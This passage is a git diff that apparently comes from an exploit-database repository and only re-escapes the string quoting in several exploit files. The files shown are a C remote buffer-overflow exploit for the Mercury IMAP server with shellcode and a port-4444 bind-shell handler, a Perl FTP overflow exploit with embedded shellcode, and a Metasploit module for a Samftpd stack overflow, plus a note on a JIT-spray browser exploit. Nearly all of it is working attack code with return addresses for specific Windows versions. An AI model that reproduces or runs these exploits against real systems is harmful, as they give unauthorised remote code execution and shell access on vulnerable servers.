-"\xfa\x02\x3f\xc7\xa9\x99\x2d\xed\xcd\x40\x37\x5d\x13\x24\xda\x39"
-"\xc7\xa3\xd0\xc4\x42\xa1\x0b\x32\x67\x64\x85\xc4\x44\x9a\x81\x68"
-"\xc1\x9a\x91\x68\xd1\x9a\x2d\xeb\xf4\xa1\xc3\x67\xf4\x9a\x5b\xda"
-"\x07\xa1\x76\x21\xe2\x0e\x85\xc4\x44\xa3\xc2\x6a\xc7\x36\x02\x53"
-"\x36\x64\xfc\xd2\xc5\x36\x04\x68\xc7\x36\x02\x53\x77\x80\x54\x72"
-"\xc5\x36\x04\x6b\xc6\x9d\x87\xc4\x42\x5a\xba\xdc\xeb\x0f\xab\x6c"
-"\x6d\x1f\x87\xc4\x42\xaf\xb8\x5f\xf4\xa1\xb1\x56\x1b\x2c\xb8\x6b"
-"\xcb\xe0\x1e\xb2\x75\xa3\x96\xb2\x70\xf8\x12\xc8\x38\x37\x90\x16"
-"\x6c\x8b\xfe\xa8\x1f\xb3\xea\x90\x39\x62\xba\x49\x6c\x7a\xc4\xc4"
-"\xe7\x8d\x2d\xed\xc9\x9e\x80\x6a\xc3\x98\xb8\x3a\xc3\x98\x87\x6a"
-"\x6d\x19\xba\x96\x4b\xcc\x1c\x68\x6d\x1f\xb8\xc4\x6d\xfe\x2d\xeb"
-"\x19\x9e\x2e\xb8\x56\xad\x2d\xed\xc0\x36\x02\x53\x62\x43\xd6\x64"
-"\xc1\x36\x04\xc4\x42\xc9\xd2\x3b";
+\"\\x33\\xc9\\x83\\xe9\\xb0\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\x92\"
+\"\\xc9\\xd2\\x3b\\x83\\xeb\\xfc\\xe2\\xf4\\x6e\\xa3\\x39\\x76\\x7a\\x30\\x2d\\xc4\"
+\"\\x6d\\xa9\\x59\\x57\\xb6\\xed\\x59\\x7e\\xae\\x42\\xae\\x3e\\xea\\xc8\\x3d\\xb0\"
+\"\\xdd\\xd1\\x59\\x64\\xb2\\xc8\\x39\\x72\\x19\\xfd\\x59\\x3a\\x7c\\xf8\\x12\\xa2\"
+\"\\x3e\\x4d\\x12\\x4f\\x95\\x08\\x18\\x36\\x93\\x0b\\x39\\xcf\\xa9\\x9d\\xf6\\x13\"
+\"\\xe7\\x2c\\x59\\x64\\xb6\\xc8\\x39\\x5d\\x19\\xc5\\x99\\xb0\\xcd\\xd5\\xd3\\xd0\"
+\"\\x91\\xe5\\x59\\xb2\\xfe\\xed\\xce\\x5a\\x51\\xf8\\x09\\x5f\\x19\\x8a\\xe2\\xb0\"
+\"\\xd2\\xc5\\x59\\x4b\\x8e\\x64\\x59\\x7b\\x9a\\x97\\xba\\xb5\\xdc\\xc7\\x3e\\x6b\"
+\"\\x6d\\x1f\\xb4\\x68\\xf4\\xa1\\xe1\\x09\\xfa\\xbe\\xa1\\x09\\xcd\\x9d\\x2d\\xeb\"
+\"\\xfa\\x02\\x3f\\xc7\\xa9\\x99\\x2d\\xed\\xcd\\x40\\x37\\x5d\\x13\\x24\\xda\\x39\"
+\"\\xc7\\xa3\\xd0\\xc4\\x42\\xa1\\x0b\\x32\\x67\\x64\\x85\\xc4\\x44\\x9a\\x81\\x68\"
+\"\\xc1\\x9a\\x91\\x68\\xd1\\x9a\\x2d\\xeb\\xf4\\xa1\\xc3\\x67\\xf4\\x9a\\x5b\\xda\"
+\"\\x07\\xa1\\x76\\x21\\xe2\\x0e\\x85\\xc4\\x44\\xa3\\xc2\\x6a\\xc7\\x36\\x02\\x53\"
+\"\\x36\\x64\\xfc\\xd2\\xc5\\x36\\x04\\x68\\xc7\\x36\\x02\\x53\\x77\\x80\\x54\\x72\"
+\"\\xc5\\x36\\x04\\x6b\\xc6\\x9d\\x87\\xc4\\x42\\x5a\\xba\\xdc\\xeb\\x0f\\xab\\x6c\"
+\"\\x6d\\x1f\\x87\\xc4\\x42\\xaf\\xb8\\x5f\\xf4\\xa1\\xb1\\x56\\x1b\\x2c\\xb8\\x6b\"
+\"\\xcb\\xe0\\x1e\\xb2\\x75\\xa3\\x96\\xb2\\x70\\xf8\\x12\\xc8\\x38\\x37\\x90\\x16\"
+\"\\x6c\\x8b\\xfe\\xa8\\x1f\\xb3\\xea\\x90\\x39\\x62\\xba\\x49\\x6c\\x7a\\xc4\\xc4\"
+\"\\xe7\\x8d\\x2d\\xed\\xc9\\x9e\\x80\\x6a\\xc3\\x98\\xb8\\x3a\\xc3\\x98\\x87\\x6a\"
+\"\\x6d\\x19\\xba\\x96\\x4b\\xcc\\x1c\\x68\\x6d\\x1f\\xb8\\xc4\\x6d\\xfe\\x2d\\xeb\"
+\"\\x19\\x9e\\x2e\\xb8\\x56\\xad\\x2d\\xed\\xc0\\x36\\x02\\x53\\x62\\x43\\xd6\\x64\"
+\"\\xc1\\x36\\x04\\xc4\\x42\\xc9\\xd2\\x3b\";
 
 
   void gotshell (int newsock);
@@ -100,68 +100,68 @@ char shellcode[]=
   char buffer[size];
   char point_esp[5];
   unsigned short port;
-  char req1[] =  "\x30\x30\x30\x30\x20\x4C\x4F\x47\x49\x4E";
-  char req2[] =  "\x30\x30\x30\x31";
+  char req1[] =  \"\\x30\\x30\\x30\\x30\\x20\\x4C\\x4F\\x47\\x49\\x4E\";
+  char req2[] =  \"\\x30\\x30\\x30\\x31\";
   unsigned char *login,*exploit;
-  char vuln_command[] = "\x4C\x49\x53\x54";
-  char winxpsp1[]   = "\xCC\x59\xFB\x77"; // jmp esp in ntdll
-  char winxpsp2[]   = "\xED\x1E\x94\x7C"; // jmp esp (not tested)
-  char win2ksp4[]   = "\x23\xde\xaf\x01"; // call esp in kernel32.dll
-  char win2k3_sp0[] = "\xAB\x8B\xFB\x77"; // jmp esp in ntdll
-  char win2k3_sp1[] = "\x6A\xFA\xE8\x77"; // push esp - ret in kernel32
+  char vuln_command[] = \"\\x4C\\x49\\x53\\x54\";
+  char winxpsp1[]   = \"\\xCC\\x59\\xFB\\x77\"; // jmp esp in ntdll
+  char winxpsp2[]   = \"\\xED\\x1E\\x94\\x7C\"; // jmp esp (not tested)
+  char win2ksp4[]   = \"\\x23\\xde\\xaf\\x01\"; // call esp in kernel32.dll
+  char win2k3_sp0[] = \"\\xAB\\x8B\\xFB\\x77\"; // jmp esp in ntdll
+  char win2k3_sp1[] = \"\\x6A\\xFA\\xE8\\x77\"; // push esp - ret in kernel32
                     
  int main (int argc, char *argv[]){
   
 	
  if(argc < 6) {
- printf("\n-------- mercury imap remote BOF exploit by c0d3r\n");
- printf("-------- usage : imap.exe host port target username password\n");
- printf("-------- target 1 : windows xp service pack 1         : 0\n");
- printf("-------- target 2 : windows xp service pack 2         : 1\n");
- printf("-------- target 3 : windoes 2k advanced server sp 4   : 2\n");
- printf("-------- target 4 : windoes 2k3 server enterprise sp0 : 3\n");
- printf("-------- target 5 : windoes 2k3 server enterprise sp1 : 4\n");
- printf("-------- eg : imap.exe 127.0.0.1 143 0 c0d3r abc\n\n");	
+ printf(\"\\n-------- mercury imap remote BOF exploit by c0d3r\\n\");
+ printf(\"-------- usage : imap.exe host port target username password\\n\");
+ printf(\"-------- target 1 : windows xp service pack 1         : 0\\n\");
+ printf(\"-------- target 2 : windows xp service pack 2         : 1\\n\");
+ printf(\"-------- target 3 : windoes 2k advanced server sp 4   : 2\\n\");
+ printf(\"-------- target 4 : windoes 2k3 server enterprise sp0 : 3\\n\");
+ printf(\"-------- target 5 : windoes 2k3 server enterprise sp1 : 4\\n\");
+ printf(\"-------- eg : imap.exe 127.0.0.1 143 0 c0d3r abc\\n\\n\");	
  exit(-1) ;
   } 
-  printf("\n-------- mercury imap remote BOF exploit by c0d3r\n\n");
+  printf(\"\\n-------- mercury imap remote BOF exploit by c0d3r\\n\\n\");
  os = (unsigned short)atoi(argv[3]); 	 
   switch(os)
   {
    case 0:
     strcat(point_esp,winxpsp1);
-    printf("[+] target : windows xp service pack 1\n");
+    printf(\"[+] target : windows xp service pack 1\\n\");
 	break;
    case 1:
     strcat(point_esp,winxpsp2); 
-    printf("[+] target : windows xp service pack 2\n");
+    printf(\"[+] target : windows xp service pack 2\\n\");
 	break;
    case 2:
     strcat(point_esp,win2ksp4); 
-    printf("[+] target : windows 2000 advanced server service pack 4\n");
+    printf(\"[+] target : windows 2000 advanced server service pack 4\\n\");
 	break;
    case 3:
 	strcat(point_esp,win2k3_sp0);
-	printf("[+] target : windows 2003 server enterprise service pack 0\n");
+	printf(\"[+] target : windows 2003 server enterprise service pack 0\\n\");
 	break;
    case 4:
 	strcat(point_esp,win2k3_sp1);
-	printf("[+] target : windows 2003 server enterprise service pack 1\n");
+	printf(\"[+] target : windows 2003 server enterprise service pack 1\\n\");
 	break;
    default:
-    printf("\n[-] this target doesnt exist in the list\n\n");
+    printf(\"\\n[-] this target doesnt exist in the list\\n\\n\");
    
     exit(-1);
   }  
 	
-  printf("[+] building login data\n");
+  printf(\"[+] building login data\\n\");
   login = malloc(256);
   memset(login,0,256);
-  sprintf(login,"%s %s %s\r\n",req1,argv[4],argv[5]);
+  sprintf(login,\"%s %s %s\\r\\n\",req1,argv[4],argv[5]);
 
     // Creating heart of exploit code 4 5
   
-    printf("[+] building overflow string");
+    printf(\"[+] building overflow string\");
   
     memset(buffer,NOP,size);
     memcpy(buffer+260,point_esp,sizeof(point_esp)-1);
@@ -169,13 +169,13 @@ char shellcode[]=
     buffer[size] = 0;
     exploit = malloc(1000);
     memset(exploit,0,1000);
-    sprintf(exploit,"%s %s %s\r\n",req2,vuln_command,buffer);
+    sprintf(exploit,\"%s %s %s\\r\\n\",req2,vuln_command,buffer);
 	
    // EO heart of exploit code 
 
   
 			if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0){
-   printf("[-] WSAStartup failed !\n");
+   printf(\"[-] WSAStartup failed !\\n\");
    exit(-1);
   }
 	hp = gethostbyname(argv[1]);
@@ -184,12 +184,12 @@ char shellcode[]=
    addr = inet_addr(argv[1]);
   }
   if ((!hp)  && (addr == INADDR_NONE) ){
-   printf("[-] unable to resolve %s\n",argv[1]);
+   printf(\"[-] unable to resolve %s\\n\",argv[1]);
    exit(-1);
   }
   sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
   if (!sock){ 
-   printf("[-] socket() error...\n");
+   printf(\"[-] socket() error...\\n\");
    exit(-1);
   }
 	  if (hp != NULL)
@@ -205,50 +205,50 @@ char shellcode[]=
   tcp.sin_port=htons(port);
    
   
-  printf("\n[+] attacking host %s\n" , argv[1]) ;
+  printf(\"\\n[+] attacking host %s\\n\" , argv[1]) ;
   
   Sleep(1000);
   
-  printf("[+] packet size = %d byte\n" , sizeof(buffer));
+  printf(\"[+] packet size = %d byte\\n\" , sizeof(buffer));
   
   rc=connect(sock, (struct sockaddr *) &tcp, sizeof (struct sockaddr_in));
   if(rc==0)
   {
     
      Sleep(1500) ;
-     printf("[+] connected\n") ;
-     printf("[+] sending login info\n") ;
+     printf(\"[+] connected\\n\") ;
+     printf(\"[+] sending login info\\n\") ;
      send(sock,login,strlen(login),0);
      Sleep(1500);
-     printf("[+] sending exploit string\n") ;
+     printf(\"[+] sending exploit string\\n\") ;
      send(sock,exploit,strlen(exploit),0);
      Sleep(1500);
-     printf("[+] exploit sent successfully to %s \n" , argv[1]);
-     printf("[+] trying to get shell\n");
-     printf("[+] connecting to %s on port 4444\n",argv[1]);
+     printf(\"[+] exploit sent successfully to %s \\n\" , argv[1]);
+     printf(\"[+] trying to get shell\\n\");
+     printf(\"[+] connecting to %s on port 4444\\n\",argv[1]);
      sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
      Sleep(1500);
      if (!sock){ 
-     printf("[-] socket() error...\n");
+     printf(\"[-] socket() error...\\n\");
      exit(-1);
 	 }
 	 tcp.sin_family = AF_INET;
 	 tcp.sin_port=htons(4444);
 	 rc2=connect(sock, (struct sockaddr *) &tcp, sizeof (struct sockaddr_in));
      if(rc2 != 0) {
-	 printf("[-] exploit probably failed\n");
+	 printf(\"[-] exploit probably failed\\n\");
 	 exit(-1);
 	 }
      if(rc2==0)
 	 {
-	  printf("[+] target exploited successfully\n");
-      printf("[+] Dropping into shell\n\n");
+	  printf(\"[+] target exploited successfully\\n\");
+      printf(\"[+] Dropping into shell\\n\\n\");
 	 gotshell(sock);
 	 }
   } 
   
   else {
-      printf("[-] ouch! Server is not listening .... \n");
+      printf(\"[-] ouch! Server is not listening .... \\n\");
  }
   shutdown(sock,1);
   closesocket(sock);
@@ -274,14 +274,14 @@ char shellcode[]=
 	length = recv (new_sock, bufferx, sizeof (bufferx), 0);
 	if (length <= 0) 
 		{
-	printf ("[-] Connection closed.\n");
+	printf (\"[-] Connection closed.\\n\");
 	WSACleanup();
 	return;
 		}
 	length = write (1, bufferx, length);
 	if (length <= 0) 
 		{
-	printf("[-] Connection closed.\n");
+	printf(\"[-] Connection closed.\\n\");
 	WSACleanup();
 	return;
 		}
@@ -291,14 +291,14 @@ char shellcode[]=
 	length = read (0, bufferx, sizeof (bufferx));
 	if (length <= 0) 
 		{
-	printf("[-] Connection closed.\n");
+	printf(\"[-] Connection closed.\\n\");
 	WSACleanup();
 	return;
 		}
 	length = send(new_sock, bufferx, length, 0);
 	if (length <= 0) 
 	{
-	printf("[-] Connection closed.\n");
+	printf(\"[-] Connection closed.\\n\");
 	WSACleanup();
 	return;
 				}
diff --git a/platforms/windows/remote/12614.txt b/platforms/windows/remote/12614.txt
index aeda58600..4b287929e 100755
--- a/platforms/windows/remote/12614.txt
+++ b/platforms/windows/remote/12614.txt
@@ -4,7 +4,7 @@ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sp
 Unzip and run START.htm
 
 This exploit use JIT-SPRAY for DEP and ASLR bypass.
-jit-shellcode: system("notepad")
+jit-shellcode: system(\"notepad\")
 
 0day.html - use 0x09090101 address for CALL JITed shellcode.
 
diff --git a/platforms/windows/remote/1448.pl b/platforms/windows/remote/1448.pl
index 047425cb3..94dfad554 100755
--- a/platforms/windows/remote/1448.pl
+++ b/platforms/windows/remote/1448.pl
@@ -6,56 +6,56 @@ use Net::FTP;                 # <- jo, að tinginys :)
 use Switch;
 
 if (@ARGV < 3) {
-print "--------------------------------------------------------------------\n";
-print "Usage : exploit.pl -hVictimsIPAddress -yYourIPAddress -oOffsetNumber\n";
-print " Offsets: \n";
-print " 1 - 0x76B43AE0 Windows XP SP2 winmm.dll call esp\n";
-print " 2 - 0x76B5D17B Windows XP SP1 winmm.dll call esp\n";
-print " 3 - 0x71AB7BFB Windows XP SP0 ws2_32.dll jmp esp\n";
-print " 4 - 0x9C2295DF FreeBSD 6.0-RELEASE Wine 0.9.6  kernel32.dll jmp esp\n";
-print " If values not specified, default values will be used.\n";
-print " Example : ./eploit.pl -h127.0.0.1 -y127.0.0.1 -o1\n";
-print "--------------------------------------------------------------------\n";
+print \"--------------------------------------------------------------------\\n\";
+print \"Usage : exploit.pl -hVictimsIPAddress -yYourIPAddress -oOffsetNumber\\n\";
+print \" Offsets: \\n\";
+print \" 1 - 0x76B43AE0 Windows XP SP2 winmm.dll call esp\\n\";
+print \" 2 - 0x76B5D17B Windows XP SP1 winmm.dll call esp\\n\";
+print \" 3 - 0x71AB7BFB Windows XP SP0 ws2_32.dll jmp esp\\n\";
+print \" 4 - 0x9C2295DF FreeBSD 6.0-RELEASE Wine 0.9.6  kernel32.dll jmp esp\\n\";
+print \" If values not specified, default values will be used.\\n\";
+print \" Example : ./eploit.pl -h127.0.0.1 -y127.0.0.1 -o1\\n\";
+print \"--------------------------------------------------------------------\\n\";
 }
-$host =   "127.0.0.1";        # aukos ip
-$yourip = "127.0.0.1" ;       # Reikalingas tam, kad bûtø galima sulyginti ðelkodà, nes i steka ásiraðo ir jusu ip adresas, todel áraðykit savo iðorini (jei neturit tokio - gateway ip)
-$offset = "\xE0\x3A\xB4\x76"; # defaultinis offsetas á winmm.dll esantá call esp   (WinXP SP 2)
+$host =   \"127.0.0.1\";        # aukos ip
+$yourip = \"127.0.0.1\" ;       # Reikalingas tam, kad bûtø galima sulyginti ðelkodà, nes i steka ásiraðo ir jusu ip adresas, todel áraðykit savo iðorini (jei neturit tokio - gateway ip)
+$offset = \"\\xE0\\x3A\\xB4\\x76\"; # defaultinis offsetas á winmm.dll esantá call esp   (WinXP SP 2)
 
 foreach (@ARGV) {
-$host = $1 if ($_=~/-h((.*)\.(.*)\.(.*)\.(.*))/);
-$yourip = $1 if ($_=~/-y((.*)\.(.*)\.(.*)\.(.*))/);
+$host = $1 if ($_=~/-h((.*)\\.(.*)\\.(.*)\\.(.*))/);
+$yourip = $1 if ($_=~/-y((.*)\\.(.*)\\.(.*)\\.(.*))/);
 $offset = $1 if ($_=~/-o(.*)/);
 }
 #offsetø suradimui naudokit findjmp.exe arba metasploit.com opcodø db ;)  (call esp/jmp esp..)
 switch ($offset) {
-case 1 { $offset = "\xE0\x3A\xB4\x76" } # Windows XP SP2 winmm.dll call esp
-case 2 { $offset = "\x7B\xD1\xB5\x76" } # Windows XP SP1 winmm.dll call esp
-case 3 { $offset = "\xFB\x7B\xAB\x71" } # Windows XP SP0 ws2_32.dll jmp esp
-case 4 { $offset = "\xDF\x95\x22\x9C" } # FreeBSD 6.0-RELEASE Wine 0.9.6  kernel32.dll jmp esp
+case 1 { $offset = \"\\xE0\\x3A\\xB4\\x76\" } # Windows XP SP2 winmm.dll call esp
+case 2 { $offset = \"\\x7B\\xD1\\xB5\\x76\" } # Windows XP SP1 winmm.dll call esp
+case 3 { $offset = \"\\xFB\\x7B\\xAB\\x71\" } # Windows XP SP0 ws2_32.dll jmp esp
+case 4 { $offset = \"\\xDF\\x95\\x22\\x9C\" } # FreeBSD 6.0-RELEASE Wine 0.9.6  kernel32.dll jmp esp
 }
 
-foreach $letter (split '', $yourip) { $c++;};
-$ftp = Net::FTP->new($host, Debug => 0)  or die "Cannot connect: $@";
-$user = "A" x 213 . # vaþiuojam iki returno :O  (cia irgi galima kiðt ðelkodà :) )
-"A" x (15 - $c)   . # dar keli baitai sulyginimui, nes á stekà taip pat ásiraðo ir ip adresas, todël reikia pagal já paskaièiuot, kur raðyt ret adresà
-$offset .           # ret adresas á kokio dll'o call esp  ar jmp esp, ar ka nors panaðaus svarbu, kad nuðoktume á esp ;)
-"\x90" x 25 .       # nop'ø sled'as, kad sulygintume su esp esanèiu adresu
+foreach $letter (split \'\', $yourip) { $c++;};
+$ftp = Net::FTP->new($host, Debug => 0)  or die \"Cannot connect: $@\";
+$user = \"A\" x 213 . # vaþiuojam iki returno :O  (cia irgi galima kiðt ðelkodà :) )
+\"A\" x (15 - $c)   . # dar keli baitai sulyginimui, nes á stekà taip pat ásiraðo ir ip adresas, todël reikia pagal já paskaièiuot, kur raðyt ret adresà
+$offset .           # ret adresas á kokio dll\'o call esp  ar jmp esp, ar ka nors panaðaus svarbu, kad nuðoktume á esp ;)
+\"\\x90\" x 25 .       # nop\'ø sled\'as, kad sulygintume su esp esanèiu adresu
 
 # ðelkodas paleidþiantis notepadà (ðelkodas skirtas tiem kas sakë, jog critical mëgsta DoS :*) - norësit, ásidësit normalø..
-"\xCD\x03".
-"\xEB\x61\x56\x6A\x30\x59\x64\x8B\x01\x8B\x40\x0C".
-"\x8B\x70\x1C\xAD\x8B\x40\x08\x5E\xC3\x60\x8B\x6C".
-"\x24\x24\x8B\x45\x3C\x8B\x54\x05\x78\x01\xEA\x8B".
-"\x4A\x18\x8B\x5A\x20\x01\xEB\xE3\x34\x49\x8B\x34".
-"\x8B\x01\xEE\x31\xFF\x31\xC0\xFC\xAC\x84\xC0\x74".
-"\x07\xC1\xCF\x0D\x01\xC7\xEB\xF4\x3B\x7C\x24\x28".
-"\x75\xE1\x8B\x5A\x24\x01\xEB\x66\x8B\x0C\x4B\x8B".
-"\x5A\x1C\x01\xEB\x8B\x04\x8B\x01\xE8\x89\x44\x24".
-"\x1C\x61\xC3\xE8\x9A\xFF\xFF\xFF\x68\x98\xFE\x8A".
-"\x0E\x50\xE8\xA2\xFF\xFF\xFF\xEB\x02\xEB\x05\xE8".
-"\xF9\xFF\xFF\xFF\x5B\x83\xC3\x1C\x33\xC9\x88\x0B".
-"\x83\xEB\x0B\x41\x51\x53\xFF\xD0\x90\x6E\x6F\x74".
-"\x65\x70\x61\x64\x2E\x65\x78\x65\x01";
-$ftp->login("$user","biatch");
+\"\\xCD\\x03\".
+\"\\xEB\\x61\\x56\\x6A\\x30\\x59\\x64\\x8B\\x01\\x8B\\x40\\x0C\".
+\"\\x8B\\x70\\x1C\\xAD\\x8B\\x40\\x08\\x5E\\xC3\\x60\\x8B\\x6C\".
+\"\\x24\\x24\\x8B\\x45\\x3C\\x8B\\x54\\x05\\x78\\x01\\xEA\\x8B\".
+\"\\x4A\\x18\\x8B\\x5A\\x20\\x01\\xEB\\xE3\\x34\\x49\\x8B\\x34\".
+\"\\x8B\\x01\\xEE\\x31\\xFF\\x31\\xC0\\xFC\\xAC\\x84\\xC0\\x74\".
+\"\\x07\\xC1\\xCF\\x0D\\x01\\xC7\\xEB\\xF4\\x3B\\x7C\\x24\\x28\".
+\"\\x75\\xE1\\x8B\\x5A\\x24\\x01\\xEB\\x66\\x8B\\x0C\\x4B\\x8B\".
+\"\\x5A\\x1C\\x01\\xEB\\x8B\\x04\\x8B\\x01\\xE8\\x89\\x44\\x24\".
+\"\\x1C\\x61\\xC3\\xE8\\x9A\\xFF\\xFF\\xFF\\x68\\x98\\xFE\\x8A\".
+\"\\x0E\\x50\\xE8\\xA2\\xFF\\xFF\\xFF\\xEB\\x02\\xEB\\x05\\xE8\".
+\"\\xF9\\xFF\\xFF\\xFF\\x5B\\x83\\xC3\\x1C\\x33\\xC9\\x88\\x0B\".
+\"\\x83\\xEB\\x0B\\x41\\x51\\x53\\xFF\\xD0\\x90\\x6E\\x6F\\x74\".
+\"\\x65\\x70\\x61\\x64\\x2E\\x65\\x78\\x65\\x01\";
+$ftp->login(\"$user\",\"biatch\");
 
 # milw0rm.com [2006-01-25]
diff --git a/platforms/windows/remote/14519.html b/platforms/windows/remote/14519.html
index 389c546aa..0f1d2d1f3 100755
--- a/platforms/windows/remote/14519.html
+++ b/platforms/windows/remote/14519.html
@@ -6,22 +6,22 @@ Tested:		Windows XP SP3 on IE6 + IE7
 Date:		July, 30 2010
 -->
 
-
-
diff --git a/platforms/windows/remote/1452.pm b/platforms/windows/remote/1452.pm
index 352c3e446..bc00c1030 100755
--- a/platforms/windows/remote/1452.pm
+++ b/platforms/windows/remote/1452.pm
@@ -5,7 +5,7 @@
 ##
 
 package Msf::Exploit::pmsoftware_samftpd;
-use base "Msf::Exploit";
+use base \"Msf::Exploit\";
 use strict;
 use Pex::Text;
 
@@ -13,111 +13,111 @@ my $advanced = { };
 
 my $info =
   {
-	'Name'     => 'PMSoftware Samftpd Remote Exploit',
-	'Version'  => '$Revision: 1.0 $',
-	'Authors'  => [ '', ],
+	\'Name\'     => \'PMSoftware Samftpd Remote Exploit\',
+	\'Version\'  => \'$Revision: 1.0 $\',
+	\'Authors\'  => [ \'\', ],
 
-	'Arch'  => [ 'x86' ],
-	'OS'    => [ 'win32', 'win2000', 'winxp', 'win2003' ],
-	'Priv'  => 0,
+	\'Arch\'  => [ \'x86\' ],
+	\'OS\'    => [ \'win32\', \'win2000\', \'winxp\', \'win2003\' ],
+	\'Priv\'  => 0,
 
-	'AutoOpts'  => { 'EXITFUNC' => 'thread' },
-	'UserOpts'  =>
+	\'AutoOpts\'  => { \'EXITFUNC\' => \'thread\' },
+	\'UserOpts\'  =>
 	  {
-		'RHOST' => [1, 'ADDR', 'The target address'],
-		'RPORT' => [1, 'PORT', 'The target port', 21],
-		'USER'  => [1, 'DATA', 'Username', 'redsand0wnedj00'],
+		\'RHOST\' => [1, \'ADDR\', \'The target address\'],
+		\'RPORT\' => [1, \'PORT\', \'The target port\', 21],
+		\'USER\'  => [1, \'DATA\', \'Username\', \'redsand0wnedj00\'],
 	  },
 
-	'Payload'  =>
+	\'Payload\'  =>
 	  {
-		'Space' => 1024,
-		'BadChars'  => "\x00\x0a\x0d\x20",
-		'Keys' => ['+ws2ord'],
-	#	'Prepend' => "\x81\xc4\xff\xef\xff\xff\x44",
+		\'Space\' => 1024,
+		\'BadChars\'  => \"\\x00\\x0a\\x0d\\x20\",
+		\'Keys\' => [\'+ws2ord\'],
+	#	\'Prepend\' => \"\\x81\\xc4\\xff\\xef\\xff\\xff\\x44\",
 	  },
 
-	'Description'  =>  Pex::Text::Freeform(qq{
+	\'Description\'  =>  Pex::Text::Freeform(qq{
 		This module exploits a stack overflow in the log handler of Samftpd
 	
 }),
 
-	'Refs'  =>
+	\'Refs\'  =>
 	  [
-		['SA18574',   'secunia.com/advisories/SA18574'],
+		[\'SA18574\',   \'secunia.com/advisories/SA18574\'],
 	  ],
 
-	'DefaultTarget' => 0,
-	'Targets' =>
+	\'DefaultTarget\' => 0,
+	\'Targets\' =>
 	  [
-		['SamFtpd PmSoftware.exe WinXP SP0/1 Eng.', 0x71ab7bfb],
-		['SamFtpd PmSoftware.exe WinXP SP2 Eng.', 0x77daaccf],
+		[\'SamFtpd PmSoftware.exe WinXP SP0/1 Eng.\', 0x71ab7bfb],
+		[\'SamFtpd PmSoftware.exe WinXP SP2 Eng.\', 0x77daaccf],
 	  ],
 
-	'Keys'  => ['samftpd'],
+	\'Keys\'  => [\'samftpd\'],
 
-	'DisclosureDate' => 'Jan 25 2006',
+	\'DisclosureDate\' => \'Jan 25 2006\',
   };
 
 sub new {
 	my $class = shift;
-	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
+	my $self = $class->SUPER::new({\'Info\' => $info, \'Advanced\' => $advanced}, @_);
 	return($self);
 }
 
 sub Exploit {
 	my $self = shift;
-	my $target_host = $self->GetVar('RHOST');
-	my $target_port = $self->GetVar('RPORT');
-	my $target_idx  = $self->GetVar('TARGET');
-	my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
+	my $target_host = $self->GetVar(\'RHOST\');
+	my $target_port = $self->GetVar(\'RPORT\');
+	my $target_idx  = $self->GetVar(\'TARGET\');
+	my $shellcode   = $self->GetVar(\'EncodedPayload\')->Payload;
 	my $target      = $self->Targets->[$target_idx];
-	my $header	= "\x81\xc4\xff\xef\xff\xff\x44";
+	my $header	= \"\\x81\\xc4\\xff\\xef\\xff\\xff\\x44\";
 
 	if (! $self->InitNops(30)) {
-		$self->PrintLine("[*] Failed to initialize the NOP module.");
+		$self->PrintLine(\"[*] Failed to initialize the NOP module.\");
 		return;
 	}
 
-	my $evil = ("PASS ");
-	$evil .= "A"x219;
+	my $evil = (\"PASS \");
+	$evil .= \"A\"x219;
 
-	$evil .= pack("V", $target->[1]) x 5 ;
-	$evil .= "\x90\x90" x 5; # little bit of padding
+	$evil .= pack(\"V\", $target->[1]) x 5 ;
+	$evil .= \"\\x90\\x90\" x 5; # little bit of padding
 	$evil .= $shellcode;
-	$evil .= "\x0a\x0d";
+	$evil .= \"\\x0a\\x0d\";
 
 	my $s = Msf::Socket::Tcp->new
 	  (
-		'PeerAddr'  => $target_host,
-		'PeerPort'  => $target_port,
-		'LocalPort' => $self->GetVar('CPORT'),
+		\'PeerAddr\'  => $target_host,
+		\'PeerPort\'  => $target_port,
+		\'LocalPort\' => $self->GetVar(\'CPORT\'),
 	  );
 
-	$self->PrintLine(sprintf ("[*] PMSoftware Samftpd Remote Exploit by redsand\@blacksecurity.org"));
+	$self->PrintLine(sprintf (\"[*] PMSoftware Samftpd Remote Exploit by redsand\\@blacksecurity.org\"));
 
 	if ($s->IsError) {
-		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
+		$self->PrintLine(\'[*] Error creating socket: \' . $s->GetError);
 		return;
 	}
 
-	#$self->PrintLine(sprintf ("[*] Trying ".$target->[0]." using return address 0x%.8x....", $target->[4]));
+	#$self->PrintLine(sprintf (\"[*] Trying \".$target->[0].\" using return address 0x%.8x....\", $target->[4]));
 
 	my $r = $s->Recv(-1, 30);
-	if (! $r) { $self->PrintLine("[*] No response from FTP server"); return; }
-	($r) = $r =~ m/^([^\n\r]+)(\r|\n)/;
-	$self->PrintLine("[*] $r");
+	if (! $r) { $self->PrintLine(\"[*] No response from FTP server\"); return; }
+	($r) = $r =~ m/^([^\\n\\r]+)(\\r|\\n)/;
+	$self->PrintLine(\"[*] $r\");
 
-	$self->PrintLine("[*] Login as " .$self->GetVar('USER'));
-	$s->Send("USER ".$self->GetVar('USER')."\r\n");
+	$self->PrintLine(\"[*] Login as \" .$self->GetVar(\'USER\'));
+	$s->Send(\"USER \".$self->GetVar(\'USER\').\"\\r\\n\");
 	$r = $s->Recv(-1, 10);
-	if (! $r) { $self->PrintLine("[*] No response from FTP server"); return; }
+	if (! $r) { $self->PrintLine(\"[*] No response from FTP server\"); return; }
 
-	$self->PrintLine("[*] Sending evil buffer....");
+	$self->PrintLine(\"[*] Sending evil buffer....\");
 	$s->Send($evil);
 	#$r = $s->Recv(-1, 10);
-	if (! $r) { $self->PrintLine("[*] No response from FTP server"); return; }
-	$self->Print("[*] $r");
+	if (! $r) { $self->PrintLine(\"[*] No response from FTP server\"); return; }
+	$self->Print(\"[*] $r\");
 	return;
 
 }
diff --git a/platforms/windows/remote/1462.cpp b/platforms/windows/remote/1462.cpp
index 345b2ee03..c1f839030 100755
--- a/platforms/windows/remote/1462.cpp
+++ b/platforms/windows/remote/1462.cpp
@@ -1,35 +1,35 @@
 // Two includes.
 #include 
 #include 
-// Project - Settings - Link > Object/Library modules 'Ws2_32.lib' 
-#pragma comment(lib, "ws2_32")
+// Project - Settings - Link > Object/Library modules \'Ws2_32.lib\' 
+#pragma comment(lib, \"ws2_32\")
 
